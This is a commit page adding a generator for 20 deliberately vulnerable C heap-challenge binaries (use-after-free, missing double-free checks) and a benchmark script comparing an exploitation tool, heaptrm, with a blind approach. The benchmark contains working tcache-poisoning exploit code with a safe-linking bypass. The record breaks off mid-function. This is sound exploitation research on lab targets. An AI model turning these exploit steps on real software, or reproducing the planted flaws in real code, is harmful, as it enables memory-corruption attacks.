20-challenge suite benchmark: heaptrm 65% vs blind 25% overall
Browse filesEasy: 100% vs 75% (+25%), Medium: 83% vs 33% (+50%), Hard: 67% vs 0% (+67%).
heaptrm provides decisive advantage when binary lacks address leaks.
20 binaries with varying UAF read, addr leak, heap noise, slot count.
- cve_tests/gen_challenge_suite.py +241 -0
- cve_tests/run_suite_benchmark.py +295 -0
cve_tests/gen_challenge_suite.py
ADDED
|
@@ -0,0 +1,241 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
gen_challenge_suite.py — Generate 20 heap challenge binaries with varying difficulty.
|
| 4 |
+
|
| 5 |
+
Dimensions of variation:
|
| 6 |
+
- UAF read: yes / no
|
| 7 |
+
- Address leak: prints addrs / prints nothing / prints partial
|
| 8 |
+
- Heap noise: none / light (2-3) / heavy (5-10)
|
| 9 |
+
- Size classes: 1 / 3 / 5
|
| 10 |
+
- Slot count: 4 / 8 / 16
|
| 11 |
+
- Edit size: 8 bytes / full chunk
|
| 12 |
+
- Double-free protection: yes / no
|
| 13 |
+
"""
|
| 14 |
+
|
| 15 |
+
import os
|
| 16 |
+
import subprocess
|
| 17 |
+
import random
|
| 18 |
+
import json
|
| 19 |
+
from pathlib import Path
|
| 20 |
+
|
| 21 |
+
ROOT = Path(__file__).parent.parent
|
| 22 |
+
OUT = ROOT / "cve_tests" / "suite"
|
| 23 |
+
OUT.mkdir(exist_ok=True)
|
| 24 |
+
|
| 25 |
+
TEMPLATE = r"""
|
| 26 |
+
#include <stdio.h>
|
| 27 |
+
#include <stdlib.h>
|
| 28 |
+
#include <string.h>
|
| 29 |
+
#include <unistd.h>
|
| 30 |
+
#include <time.h>
|
| 31 |
+
|
| 32 |
+
#define MAX_SLOTS {max_slots}
|
| 33 |
+
#define EDIT_MAX {edit_max}
|
| 34 |
+
|
| 35 |
+
static int sizes[] = {{{sizes_str}}};
|
| 36 |
+
static int n_sizes = {n_sizes};
|
| 37 |
+
|
| 38 |
+
struct slot {{
|
| 39 |
+
char *data;
|
| 40 |
+
int size_idx;
|
| 41 |
+
int active;
|
| 42 |
+
}};
|
| 43 |
+
static struct slot slots[MAX_SLOTS];
|
| 44 |
+
|
| 45 |
+
static void heap_noise(void) {{
|
| 46 |
+
srand(time(NULL) ^ getpid());
|
| 47 |
+
int n = {noise_min} + (rand() % {noise_range});
|
| 48 |
+
for (int i = 0; i < n; i++) {{
|
| 49 |
+
int sz = sizes[rand() % n_sizes];
|
| 50 |
+
char *p = malloc(sz);
|
| 51 |
+
memset(p, 'N', sz);
|
| 52 |
+
if (rand() % {noise_free_mod} == 0) free(p);
|
| 53 |
+
}}
|
| 54 |
+
}}
|
| 55 |
+
|
| 56 |
+
int main(void) {{
|
| 57 |
+
setbuf(stdin, NULL);
|
| 58 |
+
setbuf(stdout, NULL);
|
| 59 |
+
heap_noise();
|
| 60 |
+
int choice, slot, sc;
|
| 61 |
+
char hexbuf[520];
|
| 62 |
+
while (scanf("%d", &choice) == 1) {{
|
| 63 |
+
switch (choice) {{
|
| 64 |
+
case 1:
|
| 65 |
+
if (scanf("%d %d", &slot, &sc) != 2) break;
|
| 66 |
+
if (slot < 0 || slot >= MAX_SLOTS || sc < 1 || sc > n_sizes) {{ puts("ERR"); break; }}
|
| 67 |
+
if (slots[slot].data != NULL) {{ puts("ERR"); break; }}
|
| 68 |
+
slots[slot].data = malloc(sizes[sc-1]);
|
| 69 |
+
if (!slots[slot].data) {{ puts("ERR"); break; }}
|
| 70 |
+
memset(slots[slot].data, 0, sizes[sc-1]);
|
| 71 |
+
slots[slot].size_idx = sc-1;
|
| 72 |
+
slots[slot].active = 1;
|
| 73 |
+
{alloc_print}
|
| 74 |
+
break;
|
| 75 |
+
case 2:
|
| 76 |
+
if (scanf("%d %512s", &slot, hexbuf) != 2) break;
|
| 77 |
+
if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
|
| 78 |
+
{{
|
| 79 |
+
unsigned char bytes[256] = {{0}};
|
| 80 |
+
int len = strlen(hexbuf) / 2;
|
| 81 |
+
if (len > EDIT_MAX) len = EDIT_MAX;
|
| 82 |
+
for (int i = 0; i < len; i++) {{
|
| 83 |
+
unsigned int b;
|
| 84 |
+
sscanf(hexbuf + i*2, "%2x", &b);
|
| 85 |
+
bytes[i] = (unsigned char)b;
|
| 86 |
+
}}
|
| 87 |
+
memcpy(slots[slot].data, bytes, len);
|
| 88 |
+
}}
|
| 89 |
+
puts("OK");
|
| 90 |
+
break;
|
| 91 |
+
case 3:
|
| 92 |
+
if (scanf("%d", &slot) != 1) break;
|
| 93 |
+
if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
|
| 94 |
+
{show_check}
|
| 95 |
+
{{
|
| 96 |
+
unsigned char *p = (unsigned char *)slots[slot].data;
|
| 97 |
+
int n = sizes[slots[slot].size_idx];
|
| 98 |
+
if (n > 32) n = 32;
|
| 99 |
+
for (int i = 0; i < n; i++) printf("%02x", p[i]);
|
| 100 |
+
puts("");
|
| 101 |
+
}}
|
| 102 |
+
break;
|
| 103 |
+
case 4:
|
| 104 |
+
if (scanf("%d", &slot) != 1) break;
|
| 105 |
+
if (slot < 0 || slot >= MAX_SLOTS || !slots[slot].data) {{ puts("ERR"); break; }}
|
| 106 |
+
{double_free_check}
|
| 107 |
+
free(slots[slot].data);
|
| 108 |
+
slots[slot].active = 0;
|
| 109 |
+
{free_print}
|
| 110 |
+
break;
|
| 111 |
+
case 5:
|
| 112 |
+
goto done;
|
| 113 |
+
default:
|
| 114 |
+
puts("ERR");
|
| 115 |
+
break;
|
| 116 |
+
}}
|
| 117 |
+
}}
|
| 118 |
+
done:
|
| 119 |
+
return 0;
|
| 120 |
+
}}
|
| 121 |
+
"""
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
def gen_challenge(idx, config):
|
| 125 |
+
"""Generate and compile one challenge binary."""
|
| 126 |
+
sizes = config["sizes"]
|
| 127 |
+
sizes_str = ", ".join(str(s) for s in sizes)
|
| 128 |
+
|
| 129 |
+
# UAF read protection
|
| 130 |
+
if config["uaf_read"]:
|
| 131 |
+
show_check = "/* UAF read allowed */"
|
| 132 |
+
else:
|
| 133 |
+
show_check = 'if (!slots[slot].active) { puts("DELETED"); break; }'
|
| 134 |
+
|
| 135 |
+
# Address leak on alloc
|
| 136 |
+
if config["addr_leak"] == "full":
|
| 137 |
+
alloc_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
|
| 138 |
+
elif config["addr_leak"] == "partial":
|
| 139 |
+
alloc_print = 'printf("OK %x\\n", (unsigned int)((unsigned long)slots[slot].data & 0xffff));'
|
| 140 |
+
else:
|
| 141 |
+
alloc_print = 'puts("OK");'
|
| 142 |
+
|
| 143 |
+
# Address leak on free
|
| 144 |
+
if config["addr_leak"] == "full":
|
| 145 |
+
free_print = 'printf("OK 0x%lx\\n", (unsigned long)slots[slot].data);'
|
| 146 |
+
else:
|
| 147 |
+
free_print = 'puts("OK");'
|
| 148 |
+
|
| 149 |
+
# Double-free protection
|
| 150 |
+
if config["double_free_prot"]:
|
| 151 |
+
double_free_check = 'if (!slots[slot].active) { puts("ERR"); break; }'
|
| 152 |
+
else:
|
| 153 |
+
double_free_check = "/* no double-free check */"
|
| 154 |
+
|
| 155 |
+
source = TEMPLATE.format(
|
| 156 |
+
max_slots=config["max_slots"],
|
| 157 |
+
edit_max=config["edit_max"],
|
| 158 |
+
sizes_str=sizes_str,
|
| 159 |
+
n_sizes=len(sizes),
|
| 160 |
+
noise_min=config["noise_min"],
|
| 161 |
+
noise_range=max(1, config["noise_max"] - config["noise_min"]),
|
| 162 |
+
noise_free_mod=config.get("noise_free_mod", 3),
|
| 163 |
+
alloc_print=alloc_print,
|
| 164 |
+
show_check=show_check,
|
| 165 |
+
free_print=free_print,
|
| 166 |
+
double_free_check=double_free_check,
|
| 167 |
+
)
|
| 168 |
+
|
| 169 |
+
name = f"chal_{idx:02d}"
|
| 170 |
+
src_path = OUT / f"{name}.c"
|
| 171 |
+
bin_path = OUT / name
|
| 172 |
+
|
| 173 |
+
src_path.write_text(source)
|
| 174 |
+
r = subprocess.run(
|
| 175 |
+
["gcc", "-o", str(bin_path), str(src_path), "-std=c99", "-g", "-O0", "-Wno-all"],
|
| 176 |
+
capture_output=True, text=True,
|
| 177 |
+
)
|
| 178 |
+
if r.returncode != 0:
|
| 179 |
+
return None
|
| 180 |
+
|
| 181 |
+
# Save config
|
| 182 |
+
config["name"] = name
|
| 183 |
+
config["idx"] = idx
|
| 184 |
+
(OUT / f"{name}.json").write_text(json.dumps(config, indent=2))
|
| 185 |
+
|
| 186 |
+
return name
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
def main():
|
| 190 |
+
random.seed(42)
|
| 191 |
+
|
| 192 |
+
challenges = []
|
| 193 |
+
|
| 194 |
+
# Generate 20 challenges with varying difficulty
|
| 195 |
+
configs = [
|
| 196 |
+
# Easy: UAF read, full leak, no noise
|
| 197 |
+
{"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
|
| 198 |
+
{"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
|
| 199 |
+
{"uaf_read": True, "addr_leak": "full", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 16, "edit_max": 8, "double_free_prot": False, "difficulty": "easy"},
|
| 200 |
+
{"uaf_read": True, "addr_leak": "none", "noise_min": 0, "noise_max": 0, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "easy"},
|
| 201 |
+
|
| 202 |
+
# Medium: partial info, some noise
|
| 203 |
+
{"uaf_read": True, "addr_leak": "none", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
|
| 204 |
+
{"uaf_read": True, "addr_leak": "partial", "noise_min": 1, "noise_max": 3, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": True, "difficulty": "medium"},
|
| 205 |
+
{"uaf_read": False, "addr_leak": "full", "noise_min": 0, "noise_max": 2, "sizes": [0x40], "max_slots": 8, "edit_max": 64, "double_free_prot": False, "difficulty": "medium"},
|
| 206 |
+
{"uaf_read": False, "addr_leak": "full", "noise_min": 2, "noise_max": 4, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "medium"},
|
| 207 |
+
{"uaf_read": True, "addr_leak": "none", "noise_min": 3, "noise_max": 5, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "medium"},
|
| 208 |
+
{"uaf_read": False, "addr_leak": "partial", "noise_min": 2, "noise_max": 5, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 16, "double_free_prot": False, "difficulty": "medium"},
|
| 209 |
+
|
| 210 |
+
# Hard: no UAF read, no leak, noise
|
| 211 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
|
| 212 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 7, "sizes": [0x20, 0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
|
| 213 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 4, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
|
| 214 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 10, "sizes": [0x40], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
|
| 215 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 3, "noise_max": 6, "sizes": [0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": False, "difficulty": "hard"},
|
| 216 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 5, "noise_max": 8, "sizes": [0x20, 0x40, 0x80], "max_slots": 8, "edit_max": 8, "double_free_prot": True, "difficulty": "hard"},
|
| 217 |
+
|
| 218 |
+
# Extreme: all mitigations, heavy noise, restricted
|
| 219 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
|
| 220 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 6, "noise_max": 10, "sizes": [0x20, 0x40, 0x80], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
|
| 221 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 10, "noise_max": 15, "sizes": [0x40], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "noise_free_mod": 5, "difficulty": "extreme"},
|
| 222 |
+
{"uaf_read": False, "addr_leak": "none", "noise_min": 8, "noise_max": 12, "sizes": [0x20, 0x40, 0x80, 0x100, 0x200], "max_slots": 4, "edit_max": 8, "double_free_prot": True, "difficulty": "extreme"},
|
| 223 |
+
]
|
| 224 |
+
|
| 225 |
+
for i, config in enumerate(configs):
|
| 226 |
+
name = gen_challenge(i, config)
|
| 227 |
+
if name:
|
| 228 |
+
print(f" [{config['difficulty']:8s}] {name}: uaf_read={config['uaf_read']} "
|
| 229 |
+
f"leak={config['addr_leak']:7s} noise={config['noise_min']}-{config['noise_max']} "
|
| 230 |
+
f"sizes={len(config['sizes'])} slots={config['max_slots']} edit={config['edit_max']}")
|
| 231 |
+
challenges.append(config)
|
| 232 |
+
else:
|
| 233 |
+
print(f" FAILED: challenge {i}")
|
| 234 |
+
|
| 235 |
+
# Save manifest
|
| 236 |
+
(OUT / "manifest.json").write_text(json.dumps(challenges, indent=2))
|
| 237 |
+
print(f"\nGenerated {len(challenges)} challenges in {OUT}")
|
| 238 |
+
|
| 239 |
+
|
| 240 |
+
if __name__ == "__main__":
|
| 241 |
+
main()
|
cve_tests/run_suite_benchmark.py
ADDED
|
@@ -0,0 +1,295 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
run_suite_benchmark.py — Benchmark heaptrm vs blind on 20 challenge binaries.
|
| 4 |
+
"""
|
| 5 |
+
|
| 6 |
+
import subprocess
|
| 7 |
+
import json
|
| 8 |
+
import struct
|
| 9 |
+
import os
|
| 10 |
+
import time
|
| 11 |
+
from pathlib import Path
|
| 12 |
+
from pwn import process as pwn_process, p64, u64, context
|
| 13 |
+
|
| 14 |
+
context.log_level = "error"
|
| 15 |
+
|
| 16 |
+
ROOT = Path(__file__).parent.parent
|
| 17 |
+
SUITE = ROOT / "cve_tests" / "suite"
|
| 18 |
+
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
|
| 19 |
+
TRIALS = 10
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
def exploit_heaptrm(binary, config):
|
| 23 |
+
"""Attempt exploit using heaptrm. Returns (success, turns)."""
|
| 24 |
+
turns = 0
|
| 25 |
+
sc = 1 # use first size class
|
| 26 |
+
for s in config["sizes"]:
|
| 27 |
+
if s == 0x40:
|
| 28 |
+
sc = config["sizes"].index(s) + 1
|
| 29 |
+
break
|
| 30 |
+
|
| 31 |
+
proc = subprocess.Popen(
|
| 32 |
+
[HEAPTRM, str(binary)],
|
| 33 |
+
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, text=True
|
| 34 |
+
)
|
| 35 |
+
|
| 36 |
+
def cmd(action, data=""):
|
| 37 |
+
nonlocal turns
|
| 38 |
+
turns += 1
|
| 39 |
+
proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
|
| 40 |
+
proc.stdin.flush()
|
| 41 |
+
line = proc.stdout.readline()
|
| 42 |
+
return json.loads(line) if line else {}
|
| 43 |
+
|
| 44 |
+
try:
|
| 45 |
+
# Alloc 3
|
| 46 |
+
cmd("send", f"1 0 {sc}\n")
|
| 47 |
+
cmd("send", f"1 1 {sc}\n")
|
| 48 |
+
cmd("send", f"1 2 {sc}\n")
|
| 49 |
+
|
| 50 |
+
# Free 0 and 1
|
| 51 |
+
cmd("send", "4 0\n")
|
| 52 |
+
cmd("send", "4 1\n")
|
| 53 |
+
|
| 54 |
+
# Observe — get addresses
|
| 55 |
+
r = cmd("observe")
|
| 56 |
+
if not r.get("heap"):
|
| 57 |
+
cmd("quit"); return False, turns
|
| 58 |
+
|
| 59 |
+
chunks = r["heap"]["chunks"]
|
| 60 |
+
freed = sorted([c for c in chunks if c["state"] == "freed"],
|
| 61 |
+
key=lambda c: int(c["address"], 16))
|
| 62 |
+
allocated = sorted([c for c in chunks if c["state"] == "allocated"],
|
| 63 |
+
key=lambda c: int(c["address"], 16))
|
| 64 |
+
|
| 65 |
+
if len(freed) < 1 or not allocated:
|
| 66 |
+
cmd("quit"); return False, turns
|
| 67 |
+
|
| 68 |
+
# Find my chunks: the ones with highest addresses (after noise)
|
| 69 |
+
# Chunk 1 = last freed, target = first allocated after freed
|
| 70 |
+
chunk1_addr = int(freed[-1]["address"], 16)
|
| 71 |
+
target_addr = int(allocated[-1]["address"], 16)
|
| 72 |
+
|
| 73 |
+
# Safe-linking bypass
|
| 74 |
+
xor_key = chunk1_addr >> 12
|
| 75 |
+
poisoned = target_addr ^ xor_key
|
| 76 |
+
fd_hex = struct.pack("<Q", poisoned).hex()[:16]
|
| 77 |
+
|
| 78 |
+
# UAF write
|
| 79 |
+
cmd("send", f"2 1 {fd_hex}\n")
|
| 80 |
+
|
| 81 |
+
# Drain tcache
|
| 82 |
+
cmd("send", f"1 3 {sc}\n")
|
| 83 |
+
cmd("send", f"1 4 {sc}\n")
|
| 84 |
+
|
| 85 |
+
# Write marker through 4, check via 2
|
| 86 |
+
cmd("send", f"2 4 50574e454421210a\n") # "PWNED!!\n"
|
| 87 |
+
r = cmd("send", "3 2\n")
|
| 88 |
+
|
| 89 |
+
cmd("quit")
|
| 90 |
+
|
| 91 |
+
# Check output for our marker
|
| 92 |
+
output = r.get("output", "")
|
| 93 |
+
if "50574e4544" in output:
|
| 94 |
+
return True, turns
|
| 95 |
+
|
| 96 |
+
return False, turns
|
| 97 |
+
except:
|
| 98 |
+
try: proc.kill()
|
| 99 |
+
except: pass
|
| 100 |
+
return False, turns
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def exploit_blind(binary, config):
|
| 104 |
+
"""Attempt exploit without heaptrm. Returns (success, turns)."""
|
| 105 |
+
turns = 0
|
| 106 |
+
sc = 1
|
| 107 |
+
for s in config["sizes"]:
|
| 108 |
+
if s == 0x40:
|
| 109 |
+
sc = config["sizes"].index(s) + 1
|
| 110 |
+
break
|
| 111 |
+
|
| 112 |
+
p = pwn_process(str(binary))
|
| 113 |
+
turns += 1
|
| 114 |
+
|
| 115 |
+
def alloc(slot, size_class):
|
| 116 |
+
nonlocal turns; turns += 1
|
| 117 |
+
p.sendline(f"1 {slot} {size_class}".encode())
|
| 118 |
+
return p.recvline(timeout=0.5).strip()
|
| 119 |
+
|
| 120 |
+
def free_s(slot):
|
| 121 |
+
nonlocal turns; turns += 1
|
| 122 |
+
p.sendline(f"4 {slot}".encode())
|
| 123 |
+
return p.recvline(timeout=0.5).strip()
|
| 124 |
+
|
| 125 |
+
def edit(slot, hexdata):
|
| 126 |
+
nonlocal turns; turns += 1
|
| 127 |
+
p.sendline(f"2 {slot} {hexdata}".encode())
|
| 128 |
+
return p.recvline(timeout=0.5).strip()
|
| 129 |
+
|
| 130 |
+
def show(slot):
|
| 131 |
+
nonlocal turns; turns += 1
|
| 132 |
+
p.sendline(f"3 {slot}".encode())
|
| 133 |
+
return p.recvline(timeout=0.5).strip()
|
| 134 |
+
|
| 135 |
+
try:
|
| 136 |
+
r0 = alloc(0, sc)
|
| 137 |
+
r1 = alloc(1, sc)
|
| 138 |
+
r2 = alloc(2, sc)
|
| 139 |
+
|
| 140 |
+
# Extract addresses if binary leaks them
|
| 141 |
+
addr0 = addr1 = addr2 = None
|
| 142 |
+
for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
|
| 143 |
+
if r and b"0x" in r:
|
| 144 |
+
try:
|
| 145 |
+
addr_str = r.split(b"0x")[1].split()[0]
|
| 146 |
+
addr = int(addr_str, 16)
|
| 147 |
+
if name == "0": addr0 = addr
|
| 148 |
+
elif name == "1": addr1 = addr
|
| 149 |
+
elif name == "2": addr2 = addr
|
| 150 |
+
except: pass
|
| 151 |
+
|
| 152 |
+
free_s(0)
|
| 153 |
+
free_s(1)
|
| 154 |
+
|
| 155 |
+
# Try UAF read
|
| 156 |
+
leak_data = show(1)
|
| 157 |
+
leaked_fd = None
|
| 158 |
+
if leak_data and leak_data != b"DELETED" and leak_data != b"ERR" and len(leak_data) >= 16:
|
| 159 |
+
try:
|
| 160 |
+
leaked_fd = int(leak_data[:16], 16)
|
| 161 |
+
except: pass
|
| 162 |
+
|
| 163 |
+
# Determine what info we have
|
| 164 |
+
if addr1 and addr2:
|
| 165 |
+
# Full addr leak — compute directly
|
| 166 |
+
xor_key = addr1 >> 12
|
| 167 |
+
poisoned = addr2 ^ xor_key
|
| 168 |
+
elif leaked_fd and addr1:
|
| 169 |
+
# Have UAF read + alloc leak
|
| 170 |
+
xor_key = addr1 >> 12
|
| 171 |
+
poisoned = addr2 ^ xor_key if addr2 else 0
|
| 172 |
+
elif leaked_fd:
|
| 173 |
+
# UAF read only — try to decrypt with guessed key
|
| 174 |
+
guess_key = 0x555555559
|
| 175 |
+
decrypted = leaked_fd ^ guess_key
|
| 176 |
+
if 0x555555550000 < decrypted < 0x555555570000:
|
| 177 |
+
chunk0 = decrypted
|
| 178 |
+
chunk1 = chunk0 + 0x50
|
| 179 |
+
target = chunk1 + 0x50
|
| 180 |
+
poisoned = target ^ guess_key
|
| 181 |
+
else:
|
| 182 |
+
p.close(); return False, turns
|
| 183 |
+
elif addr0 and addr2:
|
| 184 |
+
# Alloc leak but no UAF read
|
| 185 |
+
xor_key = (addr0 + 0x50) >> 12 # guess chunk1 addr
|
| 186 |
+
poisoned = addr2 ^ xor_key
|
| 187 |
+
else:
|
| 188 |
+
# No info at all — must guess
|
| 189 |
+
guess_base = 0x555555559000
|
| 190 |
+
# Try a few offsets
|
| 191 |
+
for offset in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550, 0x600]:
|
| 192 |
+
chunk1_guess = guess_base + offset + 0x50
|
| 193 |
+
target_guess = chunk1_guess + 0x50
|
| 194 |
+
xor_key = chunk1_guess >> 12
|
| 195 |
+
poisoned = target_guess ^ xor_key
|
| 196 |
+
|
| 197 |
+
edit(1, p64(poisoned).hex()[:16])
|
| 198 |
+
alloc(3, sc)
|
| 199 |
+
alloc(4, sc)
|
| 200 |
+
edit(4, b"PWNED!!".hex())
|
| 201 |
+
result = show(2)
|
| 202 |
+
|
| 203 |
+
if result and b"50574e4544" in result:
|
| 204 |
+
p.close(); return True, turns
|
| 205 |
+
|
